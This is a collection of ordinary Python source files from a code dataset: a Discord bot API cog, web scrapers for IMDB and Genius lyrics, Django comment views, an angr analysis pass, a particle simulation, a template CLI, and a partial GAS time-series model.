+{"seq_id":"254952127","text":"import secrets\nfrom datetime import timedelta\nfrom typing import List\n\nfrom discord.ext.commands import Cog, Context\nimport discord\n\nfrom src.user_command import UserCommand, VaguePatternError, LongResponseException, ShortTriggerException\nfrom src.user_command import ResponseKeywordException, DuplicatedTriggerException, update_command\nfrom lib.status_codes import StatusCodes as sc\nfrom lib.config import logger\nfrom src.api.util import fetch_guild\nfrom src.api.mock_discord import MockMember, MockMessage, LogActions\n\n\nclass Api(Cog):\n\n    def __init__(self, bot):\n        self.bot = bot\n        self.fake_messages = {}\n\n    async def api_entry(self, method_name, *args, **kwargs):\n        \"\"\"Callback method for the rpc server\n\n        :param method_name: name of the method to execute\n        :param *args: args to pass through\n        :param **kwargs: kwargs to pass through\n        \"\"\"\n        try:\n            assert not method_name.startswith('_')\n            method = getattr(self, method_name)\n        except (AttributeError, AssertionError):\n            logger.warning(f\"Someone tried to call '{method}' but it doesn't exist (or is private)\")\n            return {\"message\": \"No such method\"}, sc.NOT_FOUND_404\n\n        try:\n            return await method(*args, **kwargs)\n        except Exception as e:\n            logger.exception(f\"caught exception while handling remote request\")\n            return {\"message\": f\"'{e}'\"}, sc.INTERNAL_SERVER_ERROR_500\n\n    async def ping(self):\n        return {'message': 'pong'}, sc.OK_200\n\n    async def guild_count(self):\n        return await self.bot.manager_client.guild_count()\n\n    async def set_response(self, user_id, guild_id, trigger, response):\n        guild = self.bot.get_guild(int(guild_id))\n        try:\n            command = UserCommand(self.bot.session, self.bot, trigger, response, 0, guild, user_id, new=True)\n        except VaguePatternError:\n            msg = \"Capture group too broad.\"\n            code = sc.NOT_ACCEPTABLE_406\n        except LongResponseException:\n            msg = \"Response is too long.\"\n            code = sc.PAYLOAD_TOO_LARGE_413\n        except ShortTriggerException:\n            msg = \"Trigger is too short.\"\n            code = sc.LENGTH_REQUIRED_411\n        except ResponseKeywordException:\n            msg = \"That response is protected, please use another.\"\n            code = sc.NOT_ACCEPTABLE_406\n        except DuplicatedTriggerException:\n            msg = \"Remove duplicated trigger first.\"\n            code = sc.CONFLICT_409\n        else:\n            self.bot.user_commands[guild_id].append(command)\n            msg = 'Successfully Set'\n            code = sc.OK_200\n        return {'message': msg}, code\n\n    async def is_member(self, user_id, guild_id, admin=False):\n        '''check if user is a member or admin of the given guild'''\n        guild = self.bot.get_guild(int(guild_id))\n        if not guild:\n            return {'member': False}, sc.OK_200\n        settings = self.bot.settings[guild]\n        return {\n            'member': bool(guild.get_member(int(user_id))) and (not admin or int(user_id) in settings.admins_ids)\n        }, sc.OK_200\n\n    async def get_permissions(self, user_id: int, guild_id: int):\n        guild = self.bot.get_guild(int(guild_id))\n        settings = self.bot.settings[guild]\n        default = not guild or not settings and user_id not in settings.admin_ids\n        return {'permissions': 274 if default else 65535}\n\n    async def delete_response(self, user_id, guild_id, trigger):\n        guild = self.bot.get_guild(int(guild_id))\n\n        for oldcommand in self.bot.user_commands[guild_id]:\n            if oldcommand.raw_trigger == oldcommand.filter_trigger(trigger):\n                if oldcommand.author_id == user_id or user_id in self.bot.settings[guild].admin_ids:\n                    self.bot.user_commands[guild_id].remove(oldcommand)\n                    update_command(self.bot.session, oldcommand.raw_trigger, '', 0, guild, user_id, delete=True)\n                    return {'message': \"Successfully Deleted\"}, sc.OK_200\n                else:\n                    return {'message': \"Not authorized\"}, sc.UNAUTHORIZED_401\n        return {'message': \"No such command.\"}, sc.NOT_FOUND_404\n\n    async def fetch_user_dict(self, id):\n        usr = self.bot.get_user(int(id))\n        if usr is None:\n            return {'message': \"No such user\"}, sc.NOT_FOUND_404\n        return {\n            'name': usr.name,\n            'avatar': usr.avatar,\n            'discriminator': usr.discriminator\n        }, sc.OK_200\n\n    async def get_emoji(self, id):\n        e = self.bot.get_emoji(int(id))\n        if e is None:\n            return {'message': \"No such emoji\"}, sc.NOT_FOUND_404\n        return {\n            'name': e.name,\n            'url': str(e.url)\n        }, sc.OK_200\n\n    async def get_extensions(self):\n        return {'extensions': [k for k in self.bot.extensions.keys()]}, sc.OK_200\n\n    async def reload_extension(self, extension_name):\n        name = extension_name.replace('-', '.')\n        try:\n            self.bot.reload_extension(name)\n        except discord.ext.commands.errors.ExtensionNotLoaded as e:\n            logger.exception(\"Couldn't load extension\")\n            return {\"message\": f\"Extension Not Loaded: {e}\"}, sc.SERVICE_UNAVAILABLE_503\n        return {\"message\": \"Reload signal sent\"}, sc.OK_200\n\n    @fetch_guild\n    async def bin_messages(self, guild):\n        stats_cog = self.bot.cogs[\"Server Statistics\"]\n        members, channels, times = stats_cog.bin_messages(guild, timedelta(minutes=5))\n        return {\n            'total': len(stats_cog.cache[guild.id]),\n            'members': members,\n            'channels': channels,\n            'times': times,\n        }, sc.OK_200\n\n    @fetch_guild\n    async def get_guild_data(self, guild):\n        return {\n            'name': guild.name,\n            'member_count': guild.member_count,\n        }, sc.OK_200\n\n    @fetch_guild\n    async def settings_access(self, guild, setting=None, value=None):\n        settings = self.bot.settings[guild]\n        if hasattr(settings, setting):\n            return {'value': getattr(settings, setting)}, sc.OK_200\n        return {'value': \"unknown setting\"}, sc.NOT_FOUND_404\n\n    async def tag_autbot_guilds(self, guild_list, user_id: int):\n        all_guilds, _ = await self.bot.manager_client.all_guilds()\n        for guild_dict in guild_list:\n            for guild in all_guilds:\n                if str(guild['id']) == guild_dict['id']:\n                    guild_dict['has_architus'] = True\n                    guild_dict['architus_admin'] = user_id in guild['admin_ids']\n                    break\n            else:\n                guild_dict.update({'has_architus': False, 'architus_admin': False})\n        return {'guilds': guild_list}, sc.OK_200\n\n    async def handle_mock_user_action(\n            self,\n            action: int = None,\n            messageId: int = None,\n            guildId: int = None,\n            content: str = None,\n            allowedCommands: List[str] = (),\n            emoji: str = None,\n            silent: bool = False):\n\n        message_id = messageId\n        guild_id = guildId\n        allowed_commands = allowedCommands\n\n        # this is very scuffed. guilds under this number won't have their responses added to the db\n        assert guild_id < 10000000\n\n        if action is None or message_id is None or guild_id is None:\n            return {'message': \"missing arguments\"}, sc.BAD_REQUEST_400\n\n        sends = []\n        reactions = []\n        self.fake_messages.setdefault(guild_id, {})\n        resp_id = secrets.randbits(24) | 1\n\n        if action == LogActions.MESSAGE_SEND:\n            args = content.split()\n\n            # intersection of commands that exist and commands they're allowed to see\n            possible_commands = [cmd for cmd in self.bot.commands if cmd.name in allowed_commands]\n\n            # check if they triggered help command\n            if args[0][1:] == 'help':\n                help_text = ''\n                for cmd in possible_commands:\n                    try:\n                        if args[1] in cmd.aliases or args[1] == cmd.name:\n                            help_text += f'```hi{args[1]} - {cmd.help}```'\n                            break\n                    except IndexError:\n                        help_text += f'```{cmd.name}: {cmd.help:>5}```\\n'\n\n                sends.append(help_text)\n            else:\n                # check if they triggered a builtin command\n                triggered_command = None\n                for cmd in possible_commands:\n                    if args[0][1:] in cmd.aliases + [cmd.name]:\n                        triggered_command = cmd\n                        break\n\n                mock_message = MockMessage(self.bot, message_id, sends, reactions, guild_id, content=content,\n                                           resp_id=resp_id)\n                self.fake_messages[guild_id][message_id] = mock_message\n\n                self.bot.user_commands.setdefault(int(guild_id), [])\n                if triggered_command:\n                    # found builtin command, creating fake context\n                    ctx = Context(**{\n                        'message': mock_message,\n                        'bot': self.bot,\n                        'args': args[1:],\n                        'prefix': content[0],\n                        'command': triggered_command,\n                        'invoked_with': args[0]\n                    })\n                    # override send, so ctx sends go to our list\n                    ctx.send = lambda content: sends.append(content)\n                    await ctx.invoke(triggered_command, *args[1:])\n                else:\n                    # no builtin, check for user set commands in this \"guild\"\n                    for command in self.bot.user_commands[mock_message.guild.id]:\n                        if command.triggered(mock_message.content):\n                            await command.execute(mock_message)\n                            break\n\n            # Prevent response sending for silent requests\n            if silent or not sends:\n                sends = ()\n                resp_id = None\n            else:\n                mock_message = MockMessage(self.bot, resp_id, sends, reactions, guild_id, content='\\n'.join(sends))\n                self.fake_messages[guild_id][resp_id] = mock_message\n\n            resp = {\n                'guildId': guild_id,\n                'actions': [{\n                    'action': LogActions.MESSAGE_SEND,\n                    'content': '\\n'.join(sends),\n                    'messageId': resp_id,\n                }]\n            }\n            resp['actions'] += [{\n                'action': LogActions.REACTION_ADD,\n                'emoji': r[1],\n                'messageId': resp_id,\n            } for r in reactions]\n\n        elif action == LogActions.MESSAGE_DELETE:\n            pass\n\n        elif action == LogActions.REACTION_ADD:\n            resp_id = message_id\n            fkmsg = self.fake_messages[guild_id][resp_id]\n            fkmsg.sends = sends\n            react = await fkmsg.add_reaction(emoji, bot=False)\n            await self.bot.cogs[\"Events\"].on_reaction_add(react, MockMember())\n\n            resp = {\n                'guildId': guild_id,\n                'actions': ({\n                    'action': LogActions.MESSAGE_EDIT,\n                    'content': '\\n'.join(sends),\n                    'messageId': resp_id,\n                },)\n            }\n        elif action == LogActions.REACTION_REMOVE:\n            resp_id = message_id\n            fkmsg = self.fake_messages[guild_id][resp_id]\n            fkmsg.sends = [fkmsg.content]\n            react = await fkmsg.remove_reaction(emoji)\n            await self.bot.cogs[\"Events\"].on_reaction_remove(react, MockMember())\n\n            resp = {\n                'guildId': guild_id,\n                'actions': ({\n                    'action': LogActions.MESSAGE_EDIT,\n                    'content': '\\n'.join(sends),\n                    'messageId': resp_id,\n                },)\n            }\n\n        return resp, sc.OK_200\n\n\ndef setup(bot):\n    bot.add_cog(Api(bot))\n","sub_path":"shard/src/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":12171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"262645020","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom urllib import parse\nfrom scrapy.http import Request\nimport re\nfrom Article.items import MovieItem,ArticleItem\nfrom scrapy.loader import ItemLoader\n\n\nclass JobboleSpider(scrapy.Spider):\n    name = 'IMDB'\n    allowed_domains = ['www.imdb.com']\n    start_urls = ['http://www.imdb.com/chart/top']\n\n    def parse(self, response):\n        movies_nodes= response.css('.lister-list tr')\n        for node in movies_nodes:\n\n            avatar_url=[]\n            movie_avatar= node.css('.posterColumn img::attr(src)').extract_first(\"\")\n            movie_url= node.css('.titleColumn a::attr(href)').extract_first(\"\")\n            title= node.css('.titleColumn a::text').extract_first(\"\")\n            year = node.css('.titleColumn span::text').extract_first(\"\")\n            if year:\n                res = (re.match(\".*(\\d{4}).*\",year))\n                if res:\n                    year=int(res.group(1))\n            rating = node.css(\".imdbRating strong::text\").extract_first(\"\")\n\n\n            print(parse.urljoin(response.url,movie_url))\n            yield  Request(url=(parse.urljoin(response.url,movie_url)),\n                    meta={\"title\":title,\"year\":year,\"rating\":rating,\"movie_avatar\":movie_avatar},\n                    callback=self.parse_detail)\n\n\n    def parse_detail(self,response):\n        Movie_Item=MovieItem()\n        summury= response.css(\".plot_summary \")\n        desc= summury.css('.summary_text::text').extract()[0].strip().split(\"\\n\")\n        director= summury.css('span[itemprop=\"director\"] span::text').extract()\n        cast = summury.css('span[itemprop=\"actors\"] a span::text').extract()\n        video_url=\"http://www.imdb.com\"+response.css('.video_slate a::attr(href)').extract_first(\"\")\n        count=1\n        Movie_Item[\"title\"]=response.meta[\"title\"]\n        Movie_Item[\"year\"] = response.meta.get(\"year\", \"\")\n        Movie_Item[\"rating\"] = response.meta.get(\"rating\", \"\")\n        avatar_url=[]\n        video_urls=[]\n        avatar_url.append(response.meta.get(\"movie_avatar\", \"\"))\n        video_urls.append(video_url)\n        Movie_Item[\"movie_avatar\"] = avatar_url\n        Movie_Item[\"desc\"] = \",\".join(desc)\n        Movie_Item[\"director\"] = \"/\".join(director)\n        Movie_Item[\"cast\"] = \"/\".join(cast)\n        Movie_Item[\"video_url\"] = video_url\n        item_loader=ItemLoader(item = MovieItem(),response=response)\n        return Movie_Item\n\n","sub_path":"IMDB.py","file_name":"IMDB.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"450735384","text":"import bs4\nimport requests\n\nsong_name = input(\"Enter name of song\")\nartist_name = input(\"Enter name of artist\")\n\nsong_name = song_name.replace(\" \",\"-\")\nartist_name = artist_name.replace(\" \",\"-\")\n\nurl = \"https://genius.com/\"+artist_name+\"-\"+song_name+\"-lyrics\"\nreq = requests.get(url)\nsoup = bs4.BeautifulSoup(req.text,\"lxml\")\nlyrics = soup.select(\"p\")\nlyrics = lyrics[0].text\nprint(lyrics)\n\n","sub_path":"LyricsScraper.py","file_name":"LyricsScraper.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"220856530","text":"from rest_framework.generics import (ListAPIView, RetrieveAPIView, DestroyAPIView,\n                                     CreateAPIView, RetrieveUpdateAPIView)\n\nfrom rest_framework.permissions import (IsAuthenticated, IsAdminUser, IsAuthenticatedOrReadOnly, AllowAny)\nfrom rest_framework.filters import (SearchFilter,\n                                    OrderingFilter,)\nfrom .serializers import CommentSerializer, CommentDetailSerializer\nfrom comments.models import Comment\nfrom posts.api.permissions import IsOwnerOrReadOnly\nfrom posts.api.pagination import PostLimitOffsetPagination\nfrom django.db.models import Q\n\n#class PostCreateAPIView(CreateAPIView):\n    #queryset = Post.objects.all()\n    #serializer_class = PostCreateUpdateSerializer\n    #permission_classes = [IsAuthenticated]\n\n    #def perform_create(self, serializer):\n        #serializer.save(user=self.request.user)\n\nclass CommentDetailAPIView(RetrieveAPIView):\n    queryset = Comment.objects.all()\n    serializer_class = CommentDetailSerializer\n    lookup_field = 'pk'\n\n#class PostUpdateAPIView(RetrieveUpdateAPIView):\n    #queryset = Post.objects.all()\n    #serializer_class = PostCreateUpdateSerializer\n    #lookup_field = 'slug'\n    #permission_classes = [IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\n    #def perform_update(self, serializer):\n        #serializer.save(user=self.request.user)\n\n#class PostDeleteAPIView(DestroyAPIView):\n #   queryset = Post.objects.all()\n #  serializer_class = PostDetailSerializer\n #  lookup_field = 'slug'\n #   permission_classes = [IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\nclass CommentListAPIView(ListAPIView):\n    serializer_class = CommentSerializer\n    filter_backends = [SearchFilter, OrderingFilter]\n    search_fields = ['content', 'user__first_name']\n    pagination_class = PostLimitOffsetPagination\n    def get_queryset(self, *args, **kwargs):\n        queryset_list = Comment.objects.all()\n        query = self.request.GET.get(\"q\")\n        if query:\n            queryset_list = queryset_list.filter(\n                Q(title__icontains=query)|\n                Q(content__icontains=query)|\n                Q(user__first_name__icontains=query)|\n                Q(user__last_name__icontains=query)\n            ).distinct()\n        return queryset_list\n","sub_path":"comments/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"37810498","text":"\nimport logging\n\nfrom angr import Analysis, register_analysis\nfrom angr.analyses.reaching_definitions import OP_BEFORE\nfrom angr.calling_conventions import SimRegArg, SimStackArg\n\nfrom .. import Stmt, Expr\n\nl = logging.getLogger('ailment.callsite_maker')\n\n\nclass CallSiteMaker(Analysis):\n    \"\"\"\n    Add calling convention, declaration, and args to a call site.\n    \"\"\"\n    def __init__(self, block):\n        self.block = block\n\n        self._reaching_definitions = None\n\n        self.result_block = None\n\n        self._analyze()\n\n    def _analyze(self):\n\n        last_stmt = self.block.statements[-1]\n\n        if not type(last_stmt) is Stmt.Call:\n            self.result_block = self.block\n            return\n\n        target = self._get_call_target(last_stmt)\n\n        if target is None:\n            return\n\n        if target not in self.kb.functions:\n            return\n\n        func = self.kb.functions[target]\n\n        if func.prototype is None:\n            func.find_declaration()\n\n        if func.prototype is None:\n            # cannot find a declaration to it\n            return\n\n        # Make arguments\n        args = [ ]\n        if func.calling_convention is None:\n            l.warning('%s has an unknown calling convention.', repr(func))\n        else:\n            arg_locs = func.calling_convention.arg_locs()\n            for arg_loc in arg_locs:\n                if type(arg_loc) is SimRegArg:\n                    size = arg_loc.size\n                    offset = arg_loc._fix_offset(None, size, arch=self.project.arch)\n                    args.append(Expr.Register(None, None, offset, size * 8, reg_name=arg_loc.reg_name))\n                else:\n                    raise NotImplementedError('Not implemented yet.')\n\n        new_stmts = self.block.statements[::]\n\n        new_stmts[-1] = Stmt.Call(last_stmt, last_stmt.target,\n                                  calling_convention=func.calling_convention,\n                                  prototype=func.prototype,\n                                  args=args,\n                                  **last_stmt.tags\n                                  )\n\n        new_block = self.block.copy()\n        new_block.statements = new_stmts\n\n        self.result_block = new_block\n\n    def _get_call_target(self, stmt):\n        \"\"\"\n\n        :param Stmt.Call stmt:\n        :return:\n        \"\"\"\n\n        if type(stmt.target) is Expr.Const:\n            return stmt.target.value\n\n        return None\n\nregister_analysis(CallSiteMaker, 'AILCallSiteMaker')\n","sub_path":"l3/venv-angr/lib/python3.5/site-packages/ailment/analyses/callsite_maker.py","file_name":"callsite_maker.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"321136711","text":"from .base_exception import BaseException\n\n\nclass APIResponseError(BaseException):\n\n    status_code = 400\n\n    def __init__(self, error, status_code=None, payload=None):\n        Exception.__init__(self)\n        self._error = error\n        if status_code is not None:\n            self.status_code = status_code\n        self.payload = payload\n\n    def to_dict(self):\n        return_value = dict(self.payload or ())\n        return_value['status'] = 'error'\n        return_value['message'] = self._error\n        return return_value\n","sub_path":"app/exceptions/api_response_error.py","file_name":"api_response_error.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"605008770","text":"from typing import List, Tuple\nimport pygame\nfrom particle import Particle\nfrom sorting import bubble_sort\n\nWINDOW_SIZE = (768 // 4 * 3, 768 // 4 * 3)\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\nDIM = 8  # height/width of dot\nN = 512  # number of dots\nice_list = []  # list holding dots\n\n\nif __name__ == '__main__':\n    screen = pygame.display.set_mode(WINDOW_SIZE)  # change window size\n    pygame.display.set_caption('Particles!')       # change window name\n    done = False\n    clock = pygame.time.Clock()\n\n    ice_list.append(Particle(DIM, free=False))  # create centre particle\n    ice_list[0].move(WINDOW_SIZE[0] // 2, WINDOW_SIZE[1] // 2)\n    ice_list[0].quantize_pos()\n\n    for _ in range(N - 1):  # create particles\n        x = Particle(DIM)\n        x.move_to_random_pos(0, 0, WINDOW_SIZE[0], WINDOW_SIZE[1])\n        x.quantize_pos()\n        ice_list.append(x)\n\n    while not done:\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:  # if a QUIT event is received\n                done = True                # end the program\n\n        screen.fill(WHITE)  # reset screen to white before drawing\n\n        for ice in ice_list:\n            ice.step_drunk_float_jumps()  # move particle, keep within screen\n            ice.move_into_bounds(0, 0, WINDOW_SIZE[0], WINDOW_SIZE[1])\n            ice.draw(screen)  # draw particle\n\n        # check for collision between stuck particles and free particles\n        for ice1 in filter(lambda ice: not ice.free, ice_list):\n            for ice2 in filter(lambda ice: ice.free, ice_list):\n                if ice1.check_collision(ice2):  # if there is a collision\n                    ice2.free = False           # make free particle stuck\n\n        pygame.display.flip()  # update screen\n        clock.tick(60)  # set frame rate\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"271091726","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\nimport errno\nfrom os import environ, listdir, makedirs, remove\nfrom os.path import expanduser, isfile, join\nfrom shutil import copyfile\nfrom sys import exit\nfrom subprocess import call\n\nHOME = expanduser('~')\nTEMPLATE_PATH = HOME + '/.stencil/'\nEDITOR = environ.get('EDITOR', 'vim')\n\ndef create_arg_parser():\n  parser = ArgumentParser(description=\"Organized templating.\")\n  parser.add_argument('-e', '--edit', help=\"edit a template\", metavar='')\n  parser.add_argument('-i', '--install', help=\"create a template\", metavar='')\n  parser.add_argument('-rm', '--remove', help=\"remove a template\", metavar='')\n  parser.add_argument('-ls', '--list', action='store_true', help=\"list template files\")\n  parser.add_argument('src', nargs='?', help=\"template to use\")\n  parser.add_argument('dest', nargs='?', help=\"file to create from template\")\n  return parser\n\ndef validate_args(args):\n  args_bool = [bool(v) for (k, v) in args.items() if k != 'src' and k != 'dest']\n  num_args_set = sum(args_bool)\n  if num_args_set > 1:\n    print(\"error: please use one flag at a time\")\n    exit()\n  if args['src'] is not None:\n    if num_args_set > 0:\n      print(\"error: invalid flag usage, please see --help for proper usage\")\n      exit()\n\ndef file_not_found(file_name):\n  print(\"error: could not find file: \" + str(file_name))\n  exit()\n\n# Equivalent to makedirs(path, exist_ok=True) in Python 3.2+\ndef check_and_make_dir(path):\n  try:\n    makedirs(path)\n  except OSError as exception:\n    if exception.errno != errno.EEXIST:\n      raise\n\ndef main():\n  check_and_make_dir(TEMPLATE_PATH)\n  arg_parser = create_arg_parser()\n  args = arg_parser.parse_args()\n  validate_args(vars(args))\n  if args.install is not None:\n    template_file = TEMPLATE_PATH + str(args.install)\n    if isfile(args.install):\n      copyfile(args.install, template_file)\n    else:\n      call([EDITOR, template_file])\n  elif args.edit is not None:\n    template_file = TEMPLATE_PATH + str(args.edit)\n    if isfile(template_file):\n      call([EDITOR, template_file])\n    else:\n      file_not_found(template_file)\n  elif args.remove is not None:\n    template_file = TEMPLATE_PATH + str(args.remove)\n    if isfile(template_file):\n      remove(template_file)\n    else:\n      file_not_found(template_file)\n  elif args.list == True:\n    template_files = [f for f in listdir(TEMPLATE_PATH) if isfile(join(TEMPLATE_PATH, f))]\n    for f in template_files:\n      print(str(f) + ' ')\n  elif args.src is not None:\n    template_file = TEMPLATE_PATH + str(args.src)\n    if isfile(template_file):\n      if args.dest is None:\n        args.dest = args.src\n      copyfile(template_file, str(args.dest))\n    else:\n      file_not_found(template_file)\n\nif __name__ == \"__main__\":\n  main()\n","sub_path":"stencil.py","file_name":"stencil.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"235064175","text":"import sys\nif sys.version_info < (3,):\n    range = xrange\n\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as ss\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom ..parameter import Parameter, Parameters\nfrom .. import inference as ifr\nfrom .. import tsm as tsm\nfrom .. import distributions as dst\nfrom .. import data_check as dc\n\nfrom .scores import *\nfrom .gas import *\n\nclass GASExponential(GAS):\n    \"\"\" Inherits GAS methods from GAS class (and time series methods from TSM class).\n\n    **** EXPONENTIAL GENERALIZED AUTOREGRESSIVE SCORE (GAS) MODELS ****\n\n    Parameters\n    ----------\n    data : pd.DataFrame or np.array\n        Field to specify the univariate time series data that will be used.\n\n    ar : int\n        Field to specify how many AR lags the model will have.\n\n    sc : int\n        Field to specify how many score lags terms the model will have.\n\n    integ : int (default : 0)\n        Specifies how many time to difference the time series.\n\n    target : str (pd.DataFrame) or int (np.array)\n        Specifies which column name or array index to use. By default, first\n        column/array will be selected as the dependent variable.\n\n    gradient_only : Boolean (default: True)\n        If true, will only use gradient rather than second-order terms\n        to construct the modified score.\n    \"\"\"\n\n    def __init__(self,data,ar,sc,integ=0,target=None,gradient_only=False):\n\n        # Initialize TSM object     \n        super(GASExponential,self).__init__(data=data,ar=ar,sc=sc,integ=integ,\n            target=target,gradient_only=gradient_only)\n\n        self.model_name = \"EXPONENTIAL GAS(\" + str(self.ar) + \",\" + str(self.integ) + \",\" + str(self.sc) + \") REGRESSION\"\n        self.dist = 'Exponential'\n        self.link = np.exp\n        self.scale = False\n        self.shape = False\n        self.parameters.parameter_list[0].start = np.log(1/np.mean(self.data))\n\n        if gradient_only is False:\n            self.score_function = self.adj_score_function\n        else:\n            self.score_function = self.default_score_function\n\n    def _mean_prediction(self,theta,Y,scores,h,t_params):\n        \"\"\" Creates a h-step ahead mean prediction\n\n        Parameters\n        ----------\n        theta : np.array\n            The past predicted values\n\n        Y : np.array\n            The past data\n\n        scores : np.array\n            The past scores\n\n        h : int\n            How many steps ahead for the prediction\n\n        t_params : np.array\n            A vector of (transformed) parameters\n\n        Returns\n        ----------\n        Y_exp : np.array\n            Vector of past values and predictions \n        \"\"\"     \n\n        Y_exp = Y.copy()\n        theta_exp = theta.copy()\n        scores_exp = scores.copy()\n\n        #(TODO: vectorize the inner construction here)      \n        for t in range(0,h):\n            new_value = t_params[0]\n\n            if self.ar != 0:\n                for j in range(1,self.ar+1):\n                    new_value += t_params[j]*theta_exp[-j]\n\n            if self.sc != 0:\n                for k in range(1,self.sc+1):\n                    new_value += t_params[k+self.ar]*scores_exp[-k]\n\n            Y_exp = np.append(Y_exp,[1/self.link(new_value)])\n            theta_exp = np.append(theta_exp,[new_value]) # For indexing consistency\n            scores_exp = np.append(scores_exp,[0]) # expectation of score is zero\n\n        return Y_exp\n\n    def adj_score_function(self,y,mean,scale,shape):\n        return ExponentialScore.log_lam_adj_score(y, mean)\n\n    def draw_variable(self,loc,scale,shape,nsims):\n        return np.random.exponential(1/loc, nsims)\n\n    def neg_loglik(self,beta):\n        theta, Y, scores = self._model(beta)\n        return -np.sum(ss.expon.logpdf(x=Y,scale=1/self.link(theta)))\n\n    def default_score_function(self,y,mean,scale,shape):\n        return ExponentialScore.log_lam_score(y, mean)\n\n    def predict_is(self,h=5):\n        \"\"\" Makes dynamic in-sample predictions with the estimated model\n\n        Parameters\n        ----------\n        h : int (default : 5)\n            How many steps would you like to forecast?\n\n        Returns\n        ----------\n        - pd.DataFrame with predicted values\n        \"\"\"     \n\n        predictions = []\n\n        for t in range(0,h):\n            x = GASExponential(ar=self.ar,sc=self.sc,integ=self.integ,data=self.data_original[:-h+t])\n            x.fit(printer=False)\n            \n            if t == 0:\n                predictions = x.predict(1)\n            else:\n                predictions = pd.concat([predictions,x.predict(1)])\n        \n        predictions.rename(columns={0:self.data_name}, inplace=True)\n        predictions.index = self.index[-h:]\n\n        return predictions\n\n    def plot_fit(self,intervals=False,**kwargs):\n        \"\"\" Plots the fit of the model\n\n        Returns\n        ----------\n        None (plots data and the fit)\n        \"\"\"\n\n        figsize = kwargs.get('figsize',(10,7))\n\n        if self.parameters.estimated is False:\n            raise Exception(\"No parameters estimated!\")\n        else:\n            date_index = self.index[max(self.ar,self.sc):]\n            mu, Y, scores = self._model(self.parameters.get_parameter_values())\n\n            if intervals == True:\n                sim_vector = self.link([self._bootstrap_scores(self.parameters.get_parameter_values()) for i in range(1000)]).T\n                error_bars = []\n                error_bars.append(1/np.array([np.percentile(i,5) for i in sim_vector]))\n                error_bars.append(1/np.array([np.percentile(i,95) for i in sim_vector]))\n\n            plt.figure(figsize=figsize)\n            plt.subplot(2,1,1)\n            plt.title(\"Model fit for \" + self.data_name)\n\n            if intervals == True:\n                alpha =[0.15*i/float(100) for i in range(50,12,-2)]\n                plt.fill_between(date_index, error_bars[0], error_bars[1], alpha=0.15,label='95% Confidence Interval')  \n\n            plt.plot(date_index,Y,label='Data')\n            plt.plot(date_index,1/self.link(mu),label='GAS Filter',c='black')\n            plt.legend(loc=2)   \n\n            plt.subplot(2,1,2)\n\n            if intervals == True:\n                alpha =[0.15*i/float(100) for i in range(50,12,-2)]\n                plt.fill_between(date_index, error_bars[0], error_bars[1], alpha=0.15,label='95% Confidence Interval')  \n\n            plt.plot(date_index,1/self.link(mu),label='GAS Filter',c='black')\n            plt.title(\"Filtered values for \" + self.data_name)\n            plt.legend(loc=2)   \n\n            plt.show()              \n    \n    def plot_predict(self,h=5,past_values=20,intervals=True,**kwargs):\n        \"\"\" Makes forecast with the estimated model\n\n        Parameters\n        ----------\n        h : int (default : 5)\n            How many steps ahead would you like to forecast?\n\n        past_values : int (default : 20)\n            How many past observations to show on the forecast graph?\n\n        intervals : Boolean\n            Would you like to show prediction intervals for the forecast?\n\n        Returns\n        ----------\n        - Plot of the forecast\n        \"\"\"     \n\n        figsize = kwargs.get('figsize',(10,7))\n\n        if self.parameters.estimated is False:\n            raise Exception(\"No parameters estimated!\")\n        else:\n\n            # Retrieve data, dates and (transformed) parameters\n            theta, Y, scores = self._model(self.parameters.get_parameter_values())          \n            date_index = self.shift_dates(h)\n            t_params = self.transform_parameters()\n\n            # Get mean prediction and simulations (for errors)\n            mean_values = self._mean_prediction(theta,Y,scores,h,t_params)\n            sim_values = self._sim_prediction(theta,Y,scores,h,t_params,15000)\n            error_bars, forecasted_values, plot_values, plot_index = self._summarize_simulations(mean_values,sim_values,date_index,h,past_values)\n\n            plt.figure(figsize=figsize)\n            if intervals == True:\n                alpha =[0.15*i/float(100) for i in range(50,12,-2)]\n                for count, pre in enumerate(error_bars):\n                    plt.fill_between(date_index[-h-1:], forecasted_values-pre, forecasted_values+pre,\n                        alpha=alpha[count])         \n            \n            plt.plot(plot_index,plot_values)\n            plt.title(\"Forecast for \" + self.data_name)\n            plt.xlabel(\"Time\")\n            plt.ylabel(self.data_name)\n            plt.show()\n\n    def predict(self,h=5):\n        \"\"\" Makes forecast with the estimated model\n\n        Parameters\n        ----------\n        h : int (default : 5)\n            How many steps ahead would you like to forecast?\n\n        Returns\n        ----------\n        - pd.DataFrame with predicted values\n        \"\"\"     \n\n        if self.parameters.estimated is False:\n            raise Exception(\"No parameters estimated!\")\n        else:\n\n            theta, Y, scores = self._model(self.parameters.get_parameter_values())          \n            date_index = self.shift_dates(h)\n            t_params = self.transform_parameters()\n\n            mean_values = self._mean_prediction(theta,Y,scores,h,t_params)\n            forecasted_values = mean_values[-h:]\n            result = 